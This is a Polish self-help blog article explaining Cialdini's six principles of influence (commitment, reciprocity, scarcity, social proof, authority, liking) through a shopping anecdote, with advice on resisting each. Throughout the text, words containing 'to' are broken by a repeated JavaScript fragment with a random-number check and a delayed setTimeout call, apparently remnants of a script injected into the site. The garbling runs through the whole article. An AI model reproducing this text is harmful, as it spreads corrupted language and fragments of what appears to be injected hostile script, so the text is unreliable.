Jak się bronić przed manipulacją

Planujesz małe zakupy spożywcze z małżonką. Twoja lepsza połowa wpada nagle na pomysł aby skorzystać z usług fryzjera w pobliskim centrum hdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andlowym. Ty, korzystając z chwili wolnego czasu, postanawiasz wpaść do salonu RTV AGD aby zabić nudę…

Trzy kwadranse później wkładasz do bagażnika kardom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tony, w których są: elementy kina domowego, odtwarzacz DVD oraz jonizacyjna suszarko lokówka (WTF?!) dla żony. Zastanawiasz się przy tym, jak dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to się stało, że kupiłeś te wszystkie rzeczy… No, może poza lokówką, bo dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zrobiłeś świadomie. „Zobacz kochanie, kupiłem też coś dla Ciebie” 😉

Tak się kończą wyprawy do sklepów, kiedy nie jesteśmy przygodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towani na manipulacyjne sztuczki sprzedawców.

Czy manipulacja jest zła, czy może ostatecznie przynieść dobre skutki dla osoby, która jest „manipulowana”?

Weźmy przykład, gdy nasz bohater kupił „niepotrzebne” mu kino domowe. Czyja dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to wina? Sprzedawcy, który dobrze wykonał swoją pracę (przyniósł zysk właścicielowi sklepu proponując kliendom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towi bardzo dobrej jakości sprzęt w „dobrej” cenie), czy właśnie kupującego, który nie potrafił powiedzieć „NIE”, skoro nie chciał kupić?

Inny przykład. Wyobraź sobie, że kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toś z Twoich bliskich lekceważy sympdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomy choroby i za żadne skarby nie chce iść do lekarza. Zrobisz wszystko aby jednak zagonić tę osobę do specjalisty, posuwając się nawet do manipulacji. Cel uświęca środki.

Co zrobić aby manipulacja nie była kojarzona wyłącznie negatywnie?

Wystarczy drobny zabieg: zamiana słowa „manipulacja” na … „narzędzia wywierania wpływu”. Brzmi już o niebo lepiej, prawda?

Wywieranie wpływu na innych ludzi, czyli powodowanie, aby kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toś zrobił coś, co jest na rękę komuś innemu, od lat sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane jest przez ludzi w bardzo różnych sytuacjach. Niemal w każdej chwili naszego życia kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toś wywiera na nas wpływ: nasze dziecko prosząc o nową zabawkę, sprzedawca oferując nam rewelacyjny odkurzacz, kelner zapraszając do zamówienia przepysznej potrawy, znajomi proponując wspólny wyjazd w weekend, akdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torzy wychwalając produkty w reklamach telewizyjnych…

Przed manipulacją nie uciekniesz

Skoro wiemy, że nie uciekniemy przed manipulacją, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to na pewno powinniśmy:

po pierwsze, zdawać sobie sprawę z jej istnienia,
po drugie, pogodzić się z tym, że od czasu do czasu kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toś będzie chciał ją na nas zasdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosować,
po trzecie, nauczyć się sobie z nią radzić.

Aby „bronić się” przed manipulacją musisz przede wszystkim poznać reguły, którymi się kieruje osoba manipulującą, albo mówiąc delikatniej, osoba „wywierająca wpływ na innych”. Powinieneś wiedzieć, co się dzieje w danej chwili i jaka reguła psychologiczna jest wykorzystywana w kontakcie z Tobą.

Robi się niebezpiecznie, gdy mózg chodzi na skróty

Technik wywierania wpływu mogą być tysiące. Wszystkie można przypisać jednak do jednej z sześciu kategorii. Każda z tych kategorii opiera się na jednej regule psychologicznej sterującej przebiegiem ludzkiego myślenia a w konsekwencji postępowania. Reguły te odwołują się do naszych emocji i głęboko zakorzenionych schematów (działają na zasadzie pstryk! włączam przycisk i uruchamiam mechanizm) i nie mają nic wspólnego z racjonalnym myśleniem. To właśnie wtedy Twój mózg „chodzi na skróty” aby nie analizować bez końca tysięcy bodźców z zewnątrz, jakie docierają do Ciebie w każdej sekundzie.

Odom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to reguły wywierania wpływu:

  1. Reguła konsekwencji i zaangażowania
  2. Reguła wzajemności
  3. Reguła niedostępności
  4. Reguła społecznego dowodu słuszności
  5. Reguła audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torytetu
  6. Reguła lubienia

Wróćmy teraz dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to przykładu z początku artykułu gdy nasz bohater, nazwijmy go Marian, pojawił się w sklepie tylko po dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, aby pooglądać sprzęt.

Po chwili podchodzi do niego sprzedawca i rozpoczyna rozmowę. Nasz bohater odpowiada na pytania. W końcu obaj panowie kierują się do stanowiska z kinem domowym…

Reguła konsekwencji i zaangażowania

Mówi ona o tym, że jeśli już się w coś zaangażujemy, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to mamy tendencję do trzymania się raz przyjętej postawy. Chcemy aby nasze słowa i czyny były spójne, nawet jeśli w pewnym momencie zaczynamy czuć, że „coś jest nie tak”.

Jak dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to wygląda u Mariana? Zareagował na pytania sprzedawcy i chlapnął coś o kinie domowym. Sprzedawca dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to podchwycił i zaprosił do stanowiska z takim sprzętem. Nastąpiło zaangażowanie Mariana do działania. Im dalej panowie zabrną w wyliczanie cech sprzętu, przedstawianie kolejnych modeli, włączanie, słuchanie, porównywanie, tym mocniej Marian się angażuje. Na dodatek chce być konsekwentny, bo przecież na początku powiedział, że myśli o zakupie kina w „jakiejś perspektywie czasowej”. Głupio mu się teraz wycofać. Myśli: „Poświęciłem już tyle czasu… na dodatek ten sprzedawca jest taki kompetentny. Może jednak kupię?”

Jak sobie z tym radzić?

Reaguj na sygnały biegnące z żołądka 😉 Jeśli czujesz, że Cię ściska, oznacza dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, że jesteś przymuszany, aby w imię konsekwencji podejmować decyzje, co do których nie jesteś przekonany. Powiedz grzecznie: „Dziękuję za przekazane informację. Jeśli będę na 100 proc. przekonany, że chcę kupić kino, na pewno do Pana wrócę”. Albo „To dla mnie ważna decyzja. Sprzęt jest drogi. Muszę dać sobie dzień – dwa na przemyślenie”

Reguła wzajemności

Według niej, mamy głęboko zakorzeniona potrzebę zrewanżowania się drugiej osobie, jeśli ona coś dla nas zrobiła. Jak może wykorzystać dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to sprzedawca? Może np. pójść po coś na zaplecze, do magazynu, sprawdzić w internecie albo zadzwonić do drugiego sklepu w naszym mieście.

Jak się bronić?

Możemy nie dopuścić do sytuacji, w której staniemy się „dłużnikami” albo wytłumaczyć sobie „To jego praca. Jest uprzejmy, stara się ale mnie dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to nie obliguje do kupna. On tylko poszedł na zaplecze i jego działanie jest niewspółmierne małe do mojego. Ja muszę wydać 2000 zł”. Dziękujesz i wychodzisz.

O innej technice w ramach reguły wzajemności możesz przeczytać na moim blogu w artykule

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towke/” target=”_blank”>Reguła wzajemności, czyli pożycz pan stówkę KLIK!

Reguła niedostępności

Polega na przypisywaniu przez ludzi większej wardom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tości tym możliwościom, które są niedostępne. W naszej sytuacji, przy zakupie kina domowego może dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to być „ograniczona liczba egzemplarzy” albo „ograniczony czas promocji cenowej”.

Nasz Marian atakowany jest przez sprzedawcę słowami: „To kino domowe, które tak się panu podoba, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ostatni egzemplarz w tej cenie, jaki mamy w sklepie. Promocja kończy się jutro i nie wiem, kiedy znowu będziemy mieli coś tak atrakcyjnego.”

Jak się bronić?

W tym przypadku trudno bronić się siłami samego rozumu, gdyż reguła niedostępności bardzo mocno oddziałuje na nasze emocje „Kurczę. To ostatni egzemplarz. Ja naprawdę myślę o kupnie kina domowego. Muszę je mieć!”

Jeśli odczuwamy te emocje bardzo mocno, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to właśnie jest sygnał, że powinniśmy ochłonąć. Kiedy emocje opadną, zadajmy sobie pytanie, po co naprawdę chcemy mieć ten konkretny model i czy jest dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to dla nas aż takie ważne. W zależności od naszej odpowiedzi, wracamy szybko do sklepu albo siadamy w domu przed starym telewizorem i oglądamy mecz.

Reguła społecznego dowodu słuszności

Czujemy potrzebę naśladowania innych. Reguła społecznego dowodu słuszności mówi, że częsdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to podstawą naszej decyzji częsdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to jest dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, w co inni wierzą lub jak się zachowują inni ludzie.

Sprzedawca mówi: „Ten model wybiera najwięcej naszych klientów” albo „To model roku w Wielkim Rankingu Konsumentów” Ma dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to uruchomić u Mariana myślenie: skoro inni kupują, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to musi być super!

Jak się bronić?

Ratunkiem dla naszego bohatera jest uświadomienie sobie, że postępowanie innych ludzi nie może być podstawą podejmowania własnych decyzji. Pomijam tu rozważania o różnych typach klientów. Są ludzie którzy bardziej ulegają opinii innych. Są też tacy, którzy samodzielnie podejmują decyzje.

Reguła audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torytetu

To reguła mająca związek ze społecznym dowodem słuszności, w odniesieniu do znanych osób albo profesjonalistów w danej dziedzinie. W naszej kulturze bardzo silny jest nacisk na posłuszeństwo audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torytedom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom. Szukamy ludzi, za którymi moglibyśmy podążać.

Zadajesz sobie pytanie dlaczego na telewizyjnych reklamówkach lekarstw bardzo częsdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to oglądamy osoby w fartuchu lekarza? Nawet nie wiemy, czy rzeczywiście jest dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to lekarz, czy tylko osoba ubrana jak lekarz…

Właścicielom marek chodzi o dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to abyśmy uwierzyli, że produkt poleca prawdziwy Pan Dokdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor. Dlaczego? No właśnie, tutaj włącza się reguła audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torytetu. Kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to może być lepszym polecającym pastę do zębów od sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tologa, a olej silnikowy od mechanika/kierowcy i dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to najlepiej rajdowego?

Co ciekawe, aby uwiarygodnić produkt w oczach odbiorców nie trzeba być specjalistą w danej dziedzinie, wystarczy być znaną osobą: akdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torem, piosenkarzem, celebrytą. Czy Marek Kondrat albo Szymon Majewski są specjalistami w bankowości? Czy Ewelina Lisowska zna się na parametrach technicznych sprzętu audio-video? Nie. Ona tylko wie, że uruchamiają niskie ceny i śpiewa o tym. Na dodatek strasznie…

Jak się bronić?

Zadaj sobie pytanie: Czy ten audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torytet jest rzeczywiście ekspertem? Jak dalece można mu ufać w tej sytuacji? Pierwsze pytanie odwraca naszą uwagę od samych symboli audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torytetu. Drugie przyciąga naszą uwagę do zabiegów, jakie może sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosować nasz idol, abyśmy mu bardziej zaufali.

Reguła lubienia

Lubimy osoby, które są do nas podobne. Nie tylko je lubimy. Bardziej im ufamy. I dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to właśnie wykorzystują sprzedawcy. I nie chodzi tu tylko o szczegółowe podobieństwo jak np. system wardom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tości, poglądy (choć dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to oczywiście też). Wystarczy podobieństwo zewnętrzne albo przynależność do jakiejś grupy (wędkarze, miłośnicy piłki nożnej, właściciele konkretnej marki samochodów, głowy rodzin, kawalerowie)

Nasz sprzedawca na pewno będzie poszukiwać jakiś podobieństw do Mariana. Podobieństwo może jeszcze wzmocnić odpowiednio aplikowanymi komplementami. Oczywiście jeśli będzie komplemendom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tował klienta zbyt nachalnie, osiągnie efekt odwrotny do zamierzonego, ale jeśli zrobi t mądrze, jego szanse na sprzedaż rosną. Czy wiesz, że kelnerzy, którzy komplementują klientów i są bardziej usłużni otrzymują o 30 procent wyższe napiwki?!

Jak się bronić?

Musimy uświadomić sobie skąd wziął się w nas ten nagły przypływ sympatii dla danej osoby i przeanalizujmy dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to spokojnie – rozdzielmy w naszym umyśle uczucia żywione wobec tej osoby od uczuć jakie wzbudza w nas jej propozycja.

Podsumowanie

Znasz już 6 reguł wywierania wpływu na ludzi. Z łatwością zorientujesz się więc w jaki sposób kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toś będzie próbować przekonać Cię do swoich racji, sprzedać produkt itd. Znając je nauczysz się bronić przed niepożądanym wpływem innych.

Aby na przyszłość uchronić się przed manipulowaniem Tobą przez innych, zadaj sobie kilka pytań:

W jakich sytuacjach jestem podatny/a na manipulację?
Kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to mną manipuluje?
Dlaczego kupiłem kiedyś dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, czego nie chciałem?
Dlaczego pozwoliłam innym decydować o sobie?
Dlaczego zgodziłem się z poglądem, który jest sprzeczny z moimi wardom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tościami?
Co robię źle i jak uniknąć takich sytuacji?

Taka analiza na pewno uchroni Cię przed nodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torycznym wpadaniem w sieci manipulantów.

Na koniec mam do Ciebie pytanie:

Czy ulegasz manipulacji? Może masz swoje sposoby na dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, jak się bronić przed sztuczkami sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowanymi w mediach, restauracjach, sklepach? Podziel się swoimi przemyśleniami z innymi czytelnikami bloga w komentarzu do tego artykułu.

Dodatkowe materiały:

Książka “Wywieranie wpływu na ludzi” KLIK! 

Książka audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torstwa Roberta B. Cialdiniego – wydana przez Gdańskie Wydawnictwo Psychologiczne. To książka dla każdego ponieważ każdy z nas musi wiedzieć w jaki sposób inni na niego oddziałują i jak bronić się przed takim niepożądanym działaniem. Mnóstwo inspirujących przykładów, opisanych eksperymentów, ciekawych spostrzeżeń.

 

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

Leave a Reply